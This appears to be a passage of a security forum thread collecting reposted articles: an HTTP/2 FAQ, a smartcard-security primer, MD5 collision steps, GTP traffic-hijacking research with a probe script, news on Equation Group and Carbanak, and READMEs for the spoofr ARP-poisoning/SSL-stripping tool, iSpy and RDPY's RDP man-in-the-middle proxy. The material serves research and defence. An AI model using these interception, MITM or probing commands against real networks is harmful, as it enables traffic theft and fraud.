context? Simplicity. The original proposals had stream groups, which would share context, flow control, etc. While that would benefit proxies (and the experience of users going through them), doing so added a fair bit of complexity. It was decided that we'd go with the simple thing to begin with, see how painful it was, and address the pain (if any) in a future protocol revision.
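To make the HPACK-state answer above concrete: the FAQ itself contains no code, but the SETTINGS frame it describes is easy to construct by hand from the frame layout in RFC 7540 (a 9-byte frame header, then 6 bytes per setting). The following Python sketch is our own illustration:

import struct

SETTINGS_TYPE = 0x04               # frame type (RFC 7540, section 6.5)
SETTINGS_HEADER_TABLE_SIZE = 0x01  # setting identifier
ACK_FLAG = 0x01

def settings_frame(settings, ack=False):
    """Encode an HTTP/2 SETTINGS frame: 24-bit length, 8-bit type,
    8-bit flags, 31-bit stream id (0 = connection), then id/value pairs."""
    payload = b"".join(struct.pack(">HI", ident, value) for ident, value in settings)
    header = (struct.pack(">I", len(payload))[1:]           # 24-bit length
              + bytes([SETTINGS_TYPE, ACK_FLAG if ack else 0])
              + struct.pack(">I", 0))                       # stream id 0
    return header + payload

# Tell the peer to keep no HPACK dynamic-table state:
frame = settings_frame([(SETTINGS_HEADER_TABLE_SIZE, 0)])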
Why is there an EOS symbol in HPACK? HPACK's Huffman encoding, for reasons of CPU efficiency and security, pads out Huffman-encoded strings to the next byte boundary; there may be between 0 and 7 bits of padding needed for any particular string. If one considers Huffman decoding in isolation, any symbol that is longer than the required padding would work; however, HPACK's design allows for bytewise comparison of Huffman-encoded strings. By requiring that the bits of the EOS symbol are used for padding, we ensure that users can do bytewise comparison of Huffman-encoded strings to determine equality. This in turn means that many headers can be interpreted without being Huffman-decoded. Can I implement HTTP/2 without implementing HTTP/1.1? Yes, mostly. For HTTP/2 over TLS (h2), if you do not implement the http1.1 ALPN identifier, then you will not need to support any HTTP/1.1 features. For HTTP/2 over TCP (h2c), you need to implement the initial upgrade request. h2c-only clients will need to generate a request to upgrade the connection; an OPTIONS request for "*" or a HEAD request for "/" are fairly safe and easy to construct. Clients looking to implement HTTP/2 only will need to treat HTTP/1.1 responses without a 101 status code as errors. h2c-only servers can accept a request containing the Upgrade header field with a fixed 101 response. Requests without the h2c upgrade token can be rejected with a 505 (HTTP Version Not Supported) status code that contains the Upgrade header field. Servers that don't wish to process the HTTP/1.1 response should reject stream 1 with a REFUSED_STREAM error code immediately after sending the connection preface, to encourage the client to retry the request over the upgraded HTTP/2 connection. Deployment Questions How do I debug HTTP/2 if it's encrypted? There are many ways to get access to the application data, but the easiest is to use NSS keylogging in combination with the Wireshark plugin (included in recent development releases). This works with both Firefox and Chrome. Sursa: https://http2.github.io/faq/
  5. Introduction to Smartcard Security Introduction In 1968 and 1969, the smartcard was patented in Germany by Helmut Gröttrup and Jürgen Dethloff. A smartcard is simply a card with an integrated circuit that can be programmed. This technology is used widely in our daily lives and will become one of the important keys in Internet of Things (IoT) and Machine-to-Machine (M2M) technology. Smartcard applications can be programmed using Java Card, an open platform from Sun Microsystems. Today, we find smartcard technology used mostly in communications (GSM/CDMA SIM cards) and payments (credit/debit cards). These are examples of smartcard technology used in Indonesia: Picture 1. EMV debit card. Picture 2. Bolt 4G card. Smartcard Architecture Picture 3. Smartcard architecture (image courtesy of THC) How Does the Smartcard Work? 1. Smartcard Activation In order to interact with a smartcard that has been connected to a smartcard terminal, it must be activated using electrical signals according to smartcard specification class A, B, or C (ISO/IEC 7816-3). The activation sequence goes like this: the RST pin should be put into the LOW state; the Vcc pin should be powered; the I/O pin on the smartcard terminal should be put into receive mode (although it may ignore the I/O logic while activation takes place); and the CLK pin should provide a clock signal to the smartcard. More detailed information about this activation (before timing Ta) can be seen in this picture: Picture 4. Smartcard activation and cold reset. 2. Cold Reset At the end of activation (RST pulled LOW, Vcc powered, I/O on the terminal in receive mode and CLK supplied with a stable clock signal), the smartcard is ready to enter Cold Reset. As you can see from the above picture, the clock signal at the CLK pin starts at Ta, and the smartcard will set the I/O signal to HIGH within 200 clock cycles (delay ta) after the clock signal is applied to the CLK pin (Ta + ta). The RST pin should be kept in the LOW state for at least 400 clock cycles (delay tb) after the clock signal has been applied to the CLK pin (Ta + tb). The smartcard terminal may ignore the logic on the I/O pin while the RST pin is in the LOW state. The RST pin then changes to the HIGH state at Tb. The I/O pin will begin the Answer-to-Reset between 400 and 40,000 clock cycles (delay tc) after the rising edge on the RST pin (Tb + tc). If there is no answer after 40,000 clock cycles with RST HIGH, the smartcard terminal may deactivate the smartcard. 3. Smartcard ATR (Answer-to-Reset) After the smartcard performs a cold reset, it continues with the Answer-to-Reset (ATR). The complete ATR structure is covered in ISO/IEC 7816-3, and it looks like this: TS T0 TA1 TB1 TC1 TD1 TA2 ... ... TDn T1 ... TK TCK For example, this is the Answer-to-Reset we received after performing a cold reset on a smartcard: 3B BE 94 00 40 14 47 47 33 53 33 44 48 41 54 4C 39 31 30 30 After receiving the ATR above, we interpret the data as follows: TS = 3B means that the smartcard operates using the direct convention, which works almost like the UART protocol. The direct convention operation is covered in ISO/IEC 7816-3. T0 = BE (binary 1011 1110): the high nibble (hex B = binary 1011) means that there is data in TA1, TB1 and TD1. The low nibble (hex E = decimal 14) means that there are 14 bytes of history data (TK). TA1 = 94 (binary 1001 0100): the high nibble (hex 9 = binary 1001) means that the clock-rate conversion factor is Fi = 512, with fmax = 5 MHz.
The low nibble (hex 4 = binary 0100) means that the bit-rate adjustment factor is Di = 8. TB1 = 00: according to ISO/IEC 7816-3, TB1 and TB2 are deprecated and no longer used, so the smartcard does not have to transmit them and the smartcard terminal may ignore them. TD1 = 40 (binary 0100 0000): the high nibble (hex 4 = binary 0100) means that TC2 contains data; the low nibble (hex 0 = binary 0000) means that the smartcard uses the T=0 protocol. TC2 = 14 (decimal 20): this is the Waiting Time Integer (WI), with a value of 20. Per ISO/IEC 7816-3, this value is used to calculate the Waiting Time (WT); the standard's formula is WT = WI x 960 x Fi / f. History bytes = 47 47 33 53 33 44 48 41 54 4C 39 31 30 30, which converts to ASCII: G G 3 S 3 D H A T L 9 1 0 0. 4. Protocol and Parameter Selection (PPS) After getting the Answer-to-Reset (ATR), the smartcard interface can send a PPS instruction to choose which protocol and parameters to use, making data transfer between the smartcard and the terminal easier. 5. Data Transfer Between Smartcard and Terminal After the Protocol and Parameter Selection (PPS) has been set up, the smartcard and the terminal interface can begin transferring data using Application Protocol Data Units (APDU). The complete APDU structure is covered in ISO 7816-4. Vulnerabilities There are quite a lot of vulnerabilities related to the Java card, and most of them have been documented across the Internet. These are some of the smartcard's attack vectors: 1. Physical attack: reverse engineering; smartcard cloning. 2. Remote attack: IMSI catcher. Attacking a Smartcard 1. Physical Attack A physical attack can be carried out if the attacker has physical contact with the victim's smartcard and gets access to important data on the smartcard. Once the attacker has access to that important data, he or she can clone or reprogram the smartcard. 1.1. Reverse Engineering Picture 5. Typical smartcard front side. Picture 6. Typical smartcard back side. Picture 7. Smartcard IC "die". Reverse engineering a smartcard at the silicon level is not an easy task and requires special tools such as a Scanning Electron Microscope (SEM) and/or a Focused Ion Beam (FIB). 1.2. Smartcard Cloning For this purpose, an attacker can use a couple of devices such as an oscilloscope and a smartcard reader. This is an example of a DIY smartcard reader (phoenix reader): Picture 8. DIY smartcard reader (phoenix reader). However, there's a catch with a phoenix reader like the one in the above picture: the lack of applications for interfacing with the smartcard. The reference schematic for the phoenix reader used in the above picture was developed by Dejan Kaljevic and is freely available. Picture 9. Phoenix reader schematic. Smartcard cloning is not just about programming the smartcard, but also about retrieving important information from the victim's smartcard, such as which vendor issued the card. A more convenient way to interact with the smartcard is to use a PC/SC reader with an open-source application called pcsc_scan. This is an example of pcsc_scan usage: Picture 10. Information retrieved from a payment smartcard. Picture 11. Information from a 3G/4G smartcard. As you can see in the pictures above, we can get some information from the smartcard attached to the terminal. Picture 10 shows a smartcard commonly used by financial institutions, which complies with the EMV standard, and picture 11 shows a smartcard (USIM) commonly used for communication (3G/4G).
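If you have a PC/SC reader attached, a few lines of Python with the pyscard library (the same stack pcsc_scan builds on) will pull the ATR discussed earlier straight off a card; the nibble decoding at the end is a deliberately simplified sketch of the ISO/IEC 7816-3 rules:

from smartcard.System import readers
from smartcard.util import toHexString

reader = readers()[0]            # first attached PC/SC reader
connection = reader.createConnection()
connection.connect()             # powers the card and resets it

atr = connection.getATR()
print("ATR:", toHexString(atr))  # e.g. 3B BE 94 00 40 14 47 47 ...

ts, t0 = atr[0], atr[1]
print("Convention:", "direct" if ts == 0x3B else "inverse")
print("Historical bytes (low nibble of T0):", t0 & 0x0F)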
Information like this can be used to determine what kind of encryption the smartcard uses, since vendors tend to follow standard specifications rather than use custom encryption. Attackers can then use the information to perform a remote attack. 2. Remote Attack Remotely attacking a smartcard can be achieved by exploiting vulnerabilities in the smartcard, for example by injecting a malicious "binary SMS". 2.1. IMSI Catcher The cost of this kind of attack is quite high, since the attacker must have hardware that can run OpenBTS and work as a fake BTS. In order to act as a fake BTS, that hardware has to generate a stronger signal than the real BTS, to force the victim's terminal (i.e. mobile phone) to connect to the fake BTS. Picture 12. Fake BTS (IMSI catcher) illustration. After the victim's mobile phone is connected to the fake BTS, the attacker can send a payload using the Over-the-Air (OTA) method that is common in GSM networks and direct the payload to the smartcard inside the mobile phone. Conclusion From the explanation above, we can conclude that an attacker who can exploit a vulnerability in a smartcard could cause a catastrophic event, especially where critical infrastructure is involved, such as a SCADA installation that utilizes GSM networks or a financial institution that utilizes GSM networks for its mobile banking. In order to prevent such attacks on smartcards, vendors can implement protections such as developing custom EEPROM for the Java card. References ISO/IEC 7816. (ISO/IEC 7816 - Wikipedia, the free encyclopedia) Java Card. (Java Card - Wikipedia, the free encyclopedia) Java Card Technology from Oracle. (http://www.oracle.com/technetwork/java/embedded/javacard/overview/index-jsp-140503.html) ETSI TS 100 977, TS 101 267, TS 102 221, TS 102 223, EN 302 409. Author: Tri Sumarno Sursa: Introduction to Smartcard Security - InfoSec Institute
  6. Cmd.fm - Command line: https://cmd.fm/
  7. spoofr - ARP poison and sniff with DNS spoofing, urlsnarf, driftnet, ferret, dsniff, sslstrip and tcpdump. Usage: spoofr -t <target> -s (break SSL) [in any order]; -t - target IP address extension; -s - break SSL; -h - this help. Example: spoofr -t 100 -s (attacks $ENET"100" and breaks SSL). Sursa: https://github.com/d4rkcat/Spoofr
  8. Create your own MD5 collisions A while ago a lot of people (~90,000) visited my site for a post about how easy it is to make two images with the same MD5 by using a chosen-prefix collision. I used Marc Stevens' HashClash on AWS and estimated the cost at around $0.65 per collision. Given the level of interest, I expected to see cool MD5 collisions popping up all over the place. Possibly it was enough for most people to know it can be done quite easily and cheaply, but I may also have missed out enough details in my original post. In this further post I've made an AWS image available and created a step-by-step guide so that you too can create MD5 chosen-prefix collisions and amuse your friends (disclaimer: they may not be that amused). All you need to do is create an AWS instance and run a few commands from the command line. There is an explanation of how the chosen-prefix collision works in Marc Stevens' Master's thesis. Here are the steps to create a collision. 1) Log on to the AWS console and create a spot request for an instance based on my public Amazon Machine Image (AMI). Spot requests are much cheaper than creating instances directly, typically $0.065 an hour. They can be destroyed, losing your data, if the price spikes, but for fun projects they are the way to go. I have created a public AMI called hash-clash-demo. It has the id ami-dc93d3b4 and is in the US East (North Virginia) region. It has all the software necessary to create a collision pre-built. Search for it with ami-dc93d3b4 in community AMIs and then choose a GPU2 instance. I promise it does not mine bitcoins in the background, although thinking about it, this would be a good scam and I may introduce this functionality. 2) Once your request has been created and evaluated, hopefully you will have a running instance to connect to via SSH. You may need to create a new key pair; follow the instructions on AWS to do this and install it on your local machine. Once you have your key installed, log onto the instance via ssh as ec2-user. 3) The shell script for running hash clash is located at /home/ec2-user/hashclash/src/scripts. Change into that directory and download some data to create a collision. Here I download a couple of jpeg images from tumblr. 4) It is best to run the shell script in a screen session so you can detach from it and do other stuff. Start a screen session by typing screen. Once you are in the screen session, kick off the cpc.sh shell script with your two files. Send the outputs to a log file; in this case I called it demo.output. Detach from the screen session with Ctrl A + D. 5) Tailing the log file, you should be able to see the birthday attack (which gets the hash differences into the correct locations) starting: tail -f demo.output 6) Leave the birthday search to do its thing for an hour or so. Hopefully when you come back the attack will have moved on to the next stage, creating the near-collision blocks that gradually reduce the hash differences. The best way to check this is to look at the files created. The workdir0 directory contains all the data for the current collision search for the first near-collision block. More of these will be created as more near-collision blocks are created. 7) Go away again; a watched collision pretty much never happens. Check back in ~5 hours that it is still going on. Tailing demo.output and listing the directory should let you know roughly what stage the attack is at. Here we are only at block number 2 of probably 9. 8) Come back again about 10-12 hours from the start, and with any luck we have a collision.
This one finished at 02:45 in the morning, having been started at 10:30 the previous morning. You can tell when it finished, as that was the last point the log was written to. If the log file is still being updated, the collision search is still going on. It took 9 near-collision blocks to finally eliminate all the differences, which is normal; 16 hours is a bit longer than average. The collisions have been created in files named plane.jpg.coll and ship.jpg.coll. You can verify they do indeed have the same MD5 hash with md5sum (a short Python check is sketched below as well). Here are the images with collision blocks added. I downloaded them to my local machine with scp.

Posted by Nathaniel McHugh at 2:01 PM

Sursa: http://natmchugh.blogspot.co.uk/2015/02/create-your-own-md5-collisions.html
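As mentioned above, here is a small Python check for step 8 (my own illustrative addition, using only the standard library): it confirms the two outputs share an MD5 digest while remaining different files. The file names follow the post's example.

import hashlib

def digests(path):
    with open(path, "rb") as f:
        data = f.read()
    return hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest()

md5_a, sha_a = digests("plane.jpg.coll")
md5_b, sha_b = digests("ship.jpg.coll")
assert md5_a == md5_b   # the chosen-prefix collision: identical MD5
assert sha_a != sha_b   # ...yet the file contents differ
print("MD5 collision confirmed:", md5_a)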
  9. NSA: https://twitter.com/NSA_PR/status/567554102284935169
10. The research: Mobile Internet traffic hijacking via GTP and GRX

Most users assume that mobile network access is much safer because a big mobile-telecoms provider will protect subscribers. Unfortunately, as practice shows, mobile Internet is a great opportunity for the attacker. Positive Technologies experts have detected vulnerabilities in the infrastructure of mobile networks that allow an attacker to intercept unencrypted GPRS traffic, spoof the data, block Internet access, and determine the subscriber's location. Not only cell phones are exposed to these threats, but also special devices connected to 2G/3G/4G networks via modems: ATMs and payment terminals, remote transport and industrial equipment control systems, telemetry and monitoring tools, etc.

Operators of mobile services usually encrypt GPRS traffic between the mobile terminal (smartphone, modem) and the Serving GPRS Support Node (SGSN) using the GEA-1/2/3 encryption algorithms, making it difficult to intercept and decrypt information. To bypass this restriction, an attacker can access the operator's core network, where the data is not protected by authentication mechanisms. The routing nodes (or gateway nodes) called GGSNs are a weak point. We can easily find the required nodes using Shodan.io, a search engine for Internet-connected systems, including those controlling industrial equipment. Vulnerable nodes have open GTP ports, which allow attackers to set up a connection and then encapsulate GTP control packets into the created tunnel. If the parameters are selected properly, the GGSN will accept them as packets from legitimate devices within the operator's network.

The GTP protocol described above should never be visible from the Internet. In practice, however, things are often quite different: there are more than 207,000 devices with open GTP ports across the global Internet. More than five hundred of them are components of cellular network architecture and respond to connection requests.

Another benefit for attackers is that GTP is not the only protocol used to manage the detected hosts. FTP, SSH, web interfaces, etc. are also used for management purposes. An attacker can connect to the node of a mobile network operator by exploiting vulnerabilities (for example, default passwords) in these interfaces. An experimental search on Shodan reveals some vulnerable devices, including ones with Telnet open and password authentication turned off. An attacker could intrude into the network of the operator in the Central African Republic by connecting to one such device and applying the required settings. Having access to the network of any one operator, the attacker automatically gets access to the GRX network and to other mobile operators. One single mistake made by one single operator anywhere in the world opens this attack opportunity against many other mobile networks.

Among the various ways of using a compromised boundary host, the following are worth noting: disconnecting subscribers from the Internet or blocking their access; connecting to the Internet with the credentials of a legitimate user at the expense of others; and listening to the victim's traffic for phishing attacks. An attacker can also get the subscriber's ID (IMSI) and monitor the subscriber's location worldwide until the SIM card is changed.

Let us describe some of the security threats in more detail.

Internet at the expense of others

Goal. Exhaustion of the subscriber's account and use of the connection for illegal purposes.
Attack vector: An attacker conducts attacks from the GRX network or the operator's network.

Description. The attack is based on sending "Create PDP context request" packets with the IMSI of a subscriber known in advance; the subscriber's credentials are thus used to establish the connection, and the unsuspecting subscriber will get a huge bill. It is also possible to establish a connection via the IMSI of a non-existent subscriber, as subscriber authorization is performed at the stage of connecting to the SGSN, while the GGSN receives already-verified connections. Since the SGSN is compromised, no verification is carried out.

Result. An attacker can connect to the Internet with the credentials of a legitimate user.

Data interception

Goal. To listen to the traffic of the victim and conduct a phishing attack.

Attack vector: An attacker conducts attacks from the GRX network or the operator's network.

Description. An attacker can intercept data sent between the subscriber's device and the Internet by sending an "Update PDP Context Request" message with spoofed GSN addresses to the SGSN and GGSN. This attack is an analogue of ARP spoofing, at the GTP level.

Result. Listening to or spoofing the victim's traffic and disclosure of sensitive data.

DNS tunneling

Goal. To get unpaid access to the Internet from the subscriber's mobile station.

Attack vector: The attacker is a subscriber of a mobile phone network and acts through a mobile phone.

Description. This is a well-known attack vector, rooted in the days of dial-up; the arrival of cheap, fast dedicated Internet access made it less viable, but it can still be used in mobile networks, for example in roaming, when prices for mobile Internet are unreasonably high and the data transfer speed is not that important (say, for checking email). The point of this attack is that some operators do not charge for DNS traffic, usually in order to redirect the subscriber to the operator's webpage for topping up the balance. An attacker can abuse this by sending specially crafted requests to the DNS server; to get access, one needs a specialized host on the Internet.

Result. Getting unpaid access to the Internet at the expense of the mobile operator.

Substitution of DNS for GGSN

Goal. To listen to the traffic of the victim and conduct a phishing attack.

Attack vector: An attacker acts through the Internet.

Description. If an attacker gets access to a GGSN (which is quite possible, as we have seen), the DNS address can be spoofed with the attacker's address and all the subscriber's traffic will be redirected through the attacker's host, making it possible to listen to all the subscriber's mobile traffic.

Result. The ability to listen to or spoof traffic from all subscribers and then gather confidential data for phishing attacks.

Some of the attacks cannot be performed if the equipment is configured properly, yet the results of the research made by Positive Technologies suggest that misconfiguration is a common problem in the telecommunications sphere. Vendors often leave enabled services that should be disabled on this equipment, which gives additional opportunities to attackers. Due to the large number of nodes, it is recommended to automate the control process using specific tools such as MaxPatrol. A rough sketch of how an exposed GTP-C endpoint can be probed follows below.
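As referenced above, here is a rough, assumption-laden Python sketch (not Positive Technologies' tooling) of how an exposed GTP-C endpoint can be probed: it sends a GTPv1 Echo Request to UDP port 2123 and reports whether an Echo Response comes back. Only use it against equipment you are authorized to test.

import socket
import struct

def gtp_echo(host, port=2123, timeout=3.0):
    # GTPv1 header: flags 0x32 (version 1, PT=1, sequence flag set),
    # message type 0x01 (Echo Request), length 4 (seq + N-PDU + next ext),
    # TEID 0, sequence 1, N-PDU 0, next extension header 0.
    pkt = struct.pack("!BBHIHBB", 0x32, 0x01, 4, 0, 1, 0, 0)
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(pkt, (host, port))
        data, _ = s.recvfrom(1024)
        return len(data) >= 2 and data[1] == 0x02  # 0x02 = Echo Response
    except socket.timeout:
        return False
    finally:
        s.close()

print(gtp_echo("192.0.2.1"))  # placeholder address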
How to Protect Yourself

Security measures required to protect against such attacks include proper configuration of equipment, firewalls at the GRX network edge, use of the 3GPP TS 33.210 recommendations to configure the security settings within the PS Core network, security monitoring of the perimeter, and developing security compliance standards for the equipment together with regular compliance management.

Many people rely on new communication standards that include new security technologies. However, despite the development of such standards (3G, 4G), we cannot completely abandon older-generation networks (2G). One reason lies in the specifics of how mobile networks are implemented: 2G base stations have better coverage, and 3G networks also use their infrastructure. LTE still uses the GTP protocol, so the necessary protection measures will stay relevant for the foreseeable future.

The results of this research were gathered by Positive Technologies experts in 2013 and 2014 during consulting on security analysis for several large mobile operators. For the detailed report on Vulnerabilities of Mobile Internet (GPRS), please visit the Positive Technologies official site: www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf

Posted by Positive Research at 12:54 AM

Sursa: http://blog.ptsecurity.com/2015/02/the-research-mobile-internet-traffic.html
11. VULNERABILITIES OF MOBILE INTERNET (GPRS)

Dmitry Kurbatov, Sergey Puzankov, Pavel Novikov (2014)

Contents
1. Introduction
2. Summary
3. Mobile network scheme
4. GTP protocol
5. Searching for mobile operator's facilities on the Internet
6. Threats
6.1. IMSI brute force
6.2. The disclosure of subscriber's data via IMSI
6.3. Disconnection of authorized subscribers from the Internet
6.4. Blocking the connection to the Internet
6.5. Internet at the expense of others
6.6. Data interception
6.7. DNS tunneling
6.8. Substitution of DNS for GGSN
7. Conclusion and recommendations

Download: http://www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf
12. iSpy Assessment Framework

iSpy aims to be your one-stop shop for reverse engineering and dynamic analysis of iOS applications.

Current Release
The current release is a developer preview; code is subject to change and will be unstable. However, we appreciate code contributions, feature requests, and bug reports. We currently do not have binary releases; stay tuned!

Instructions
Compiling and Installing iSpy
Injecting iSpy into Apps

Features
Easy to use Web GUI
Class dumps
Instance tracking
Automatic jailbreak-detection bypasses
Automatic SSL certificate pinning bypasses
Re-implemented objc_msgSend for logging and tracing function calls in realtime
Cycript integration; access Cycript from your browser!
Anti-anti-method swizzling
Automatic detection of vulnerable function calls
Easy to use soft-breakpoints
More on the way!

Sursa: https://github.com/BishopFox/iSpy
13. Big-brand hard disk firmware worldwide RIDDLED with NSA SPY KIT

Kaspersky: 'Equation Group' attacked 'high value targets'

17 Feb 2015 at 01:57, Darren Pauli

America's National Security Agency (NSA) has infected hard disk firmware with spyware in a campaign valued as highly as Stuxnet and dating back at least 14 years, and possibly up to two decades, according to an analysis by Kaspersky Lab and subsequent reports.

The campaign infected possibly tens of thousands of computers in telecommunications providers, governments, militaries, utilities, and mass media organisations, among others, in more than 30 countries.

The agency is said to have compromised hard drive firmware for more than a dozen top brands, including Seagate, Western Digital, IBM, Toshiba, Samsung and Maxtor, Kaspersky researchers revealed. Reuters reports that sources formerly working with the NSA confirmed the agency was responsible for the attacks, which Kaspersky itself doesn't lay at the feet of the agency.

Kaspersky's analysis says the NSA made a breakthrough by infecting hard disk firmware with malware known only as nls_933w.dll, capable of persisting across machine wipes to re-infect targeted systems.

Researchers said the actors, dubbed 'The Equation Group', had access to the firmware source code and flexed their full remote access control over infected machines only for high value targets.

"The Equation group is probably one of the most sophisticated cyber attack groups in the world," Kaspersky bods said in an advisory. "This is an astonishing technical accomplishment and is testament to the group's abilities."

"For many years they have interacted with other powerful groups, such as the Stuxnet and Flame groups; always from a position of superiority, as they had access to exploits earlier than the others."

It called the campaign the "Death Star" of the malware universe, and said (PDF) the Equation moniker was given based on the attackers' "love for encryption algorithms and obfuscation strategies".

Reuters sources at the NSA said the agency would sometimes pose as software developers to trick manufacturers into supplying source code, or could simply keep a copy of the data when the agency did official code audits on behalf of the Pentagon. Western Digital said it did not share source code with the agency. It was unknown whether other named hard drive manufacturers had done so.

Vectors

The agency spread its spy tools through compromised watering-hole jihadist sites and by intercepting and infecting removable media including CDs. The latter vector was discovered in 2009 when a scientist named Grzegorz Brzeczyszczykiewicz received a CD sent by an unnamed prestigious international scientific conference he had just attended in Houston. Kaspersky said that CD contained three exploits, of which two were zero-days, sent by the "almost omnipotent" attack group.

Another method involved custom malware dubbed Fanny, which used two zero-day flaws identical to those executed later in Stuxnet. Its main purpose, Kaspersky's researchers said, was to map air-gapped networks using a unique USB-based command and control mechanism which could pass data back and forth from air-gapped networks. This, researchers said, indicated the authors worked in collaboration with those behind the Natanz uranium plant weapon and further shored up claims that the NSA was behind the detailed attacks.

Other trojans used in the prolonged and widespread attacks were dubbed Equationlaser, Equationdrug, Doublefantasy, Triplefantasy, and Grayfish.
It detailed the trojans in a document:

EQUATIONDRUG – A very complex attack platform used by the group on its victims. It supports a module plugin system, which can be dynamically uploaded and unloaded by the attackers.

DOUBLEFANTASY – A validator-style Trojan, designed to confirm the target is the intended one. If the target is confirmed, they get upgraded to a more sophisticated platform such as EQUATIONDRUG or GRAYFISH.

EQUESTRE – Same as EQUATIONDRUG.

TRIPLEFANTASY – Full-featured backdoor sometimes used in tandem with GRAYFISH. Looks like an upgrade of DOUBLEFANTASY, and is possibly a more recent validator-style plugin.

GRAYFISH – The most sophisticated attack platform from the EQUATION Group. It resides completely in the registry, relying on a bootkit to gain execution at OS startup.

FANNY – A computer worm created in 2008 and used to gather information about targets in the Middle East and Asia. Some victims appear to have been upgraded first to DoubleFantasy, and then to the EQUATIONDRUG system. Fanny used exploits for two zero-day vulnerabilities which were later discovered with Stuxnet.

EQUATIONLASER – An early implant from the EQUATION group, used around 2001-2004. Compatible with Windows 95/98, and created sometime between DOUBLEFANTASY and EQUATIONDRUG.

Kaspersky has included indicators of compromise for the malware strains and will publish an update in coming days, it said. ®

Sursa: http://www.theregister.co.uk/2015/02/17/kaspersky_labs_equation_group/
14. CARBANAK APT: THE GREAT BANK ROBBERY

By Kaspersky

Table of contents
1. Executive Summary
2. Analysis
2.1 Infection and Transmission
2.2 Malware Analysis – Backdoor.Win32.Carbanak
2.3 Lateral movement tools
2.4 Command and Control (C2) Servers
3. Conclusions
APPENDIX 1: C2 protocol decoders
APPENDIX 2: BAT file to detect infection
APPENDIX 3: IOC hosts
APPENDIX 4: Spear phishing
APPENDIX 5: MD5 hashes of Carbanak samples

Download: https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
15. RDPY

Remote Desktop Protocol in Twisted Python.

RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event-driven network engine Twisted.

RDPY provides the following RDP and VNC binaries:
RDP Man In The Middle proxy which records sessions
RDP Honeypot
RDP screenshoter
RDP client
VNC client
VNC screenshoter
RSS Player

Build

RDPY is fully implemented in Python, except the bitmap decompression algorithm, which is implemented in C for performance purposes.

Dependencies

Dependencies are only needed for the PyQt4 binaries:
rdpy-rdpclient
rdpy-rdpscreenshot
rdpy-vncclient
rdpy-vncscreenshot
rdpy-rssplayer

Linux: example for Debian based systems:
sudo apt-get install python-qt4

Windows: install PyQt4 and PyWin32 (both are available for x86 and x86_64).

Build:
$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa
$ python rdpy/setup.py install

Or use PIP:
$ pip install rdpy

For virtualenv, you will need to link the qt4 library to it:
$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/

RDPY Binaries

RDPY comes with some very useful binaries. These binaries are Linux and Windows compatible.

rdpy-rdpclient

rdpy-rdpclient is a simple RDP Qt4 client.

$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]

You can use rdpy-rdpclient in a Recorded Session Scenario, used in rdpy-rdphoneypot.

rdpy-vncclient

rdpy-vncclient is a simple VNC Qt4 client.

$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpscreenshot

rdpy-rdpscreenshot saves the login screen in a file.

$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]

rdpy-vncscreenshot

rdpy-vncscreenshot saves the first screen update in a file.

$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpmitm

rdpy-rdpmitm is an RDP proxy that allows you to run a Man In The Middle attack on the RDP protocol. It records the session into an rss file which can be replayed by rdpy-rssplayer.

$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or server 2003 client)] target_host[:target_port]

The output directory is used to save the rss files, named with the following format (YYYYMMDDHHMMSS_ip_index.rss). The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer; the CredSSP security layer is planned for an upcoming release. If one or both parameters are omitted, the server uses standard RDP as the security layer.

rdpy-rdphoneypot

rdpy-rdphoneypot is an RDP honeypot. It uses Recorded Session Scenarios to replay scenarios through the RDP protocol.

$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N

The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer; the CredSSP security layer is planned for an upcoming release. If one or both parameters are omitted, the server uses standard RDP as the security layer. You can specify more than one file to match more common screen sizes.
rdpy-rssplayer

rdpy-rssplayer is used to replay Record Session Scenario (rss) files generated by either the rdpy-rdpmitm or rdpy-rdpclient binaries.

$ rdpy-rssplayer.py rss_file_path

RDPY Qt Widget

RDPY can also be used as a Qt widget through the rdpy.ui.qt4.QRemoteDesktop class. It can be embedded in your own Qt application. qt4reactor must be used in your app for Twisted and Qt to work together. For more details, see the sources of rdpy-rdpclient.

RDPY library

In a nutshell, RDPY can be used as a protocol library with a Twisted engine.

Simple RDP Client

from rdpy.protocol.rdp import rdp

class MyRDPFactory(rdp.ClientFactory):

    def clientConnectionLost(self, connector, reason):
        reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        reactor.stop()

    def buildObserver(self, controller, addr):

        class MyObserver(rdp.RDPClientObserver):

            def onReady(self):
                """
                @summary: Called when the stack is ready
                """
                # send 'r' key
                self._controller.sendKeyEventUnicode(ord(unicode("r".toUtf8(), encoding="UTF-8")), True)
                # mouse move and click at pixel 200x200
                self._controller.sendPointerEvent(200, 200, 1, True)

            def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
                """
                @summary: Notify bitmap update
                @param destLeft: xmin position
                @param destTop: ymin position
                @param destRight: xmax position, because RDP can send bitmaps with padding
                @param destBottom: ymax position, because RDP can send bitmaps with padding
                @param width: width of bitmap
                @param height: height of bitmap
                @param bitsPerPixel: number of bits per pixel
                @param isCompress: use RLE compression
                @param data: bitmap data
                """

            def onClose(self):
                """
                @summary: Called when the stack is closed
                """

        return MyObserver(controller)

from twisted.internet import reactor
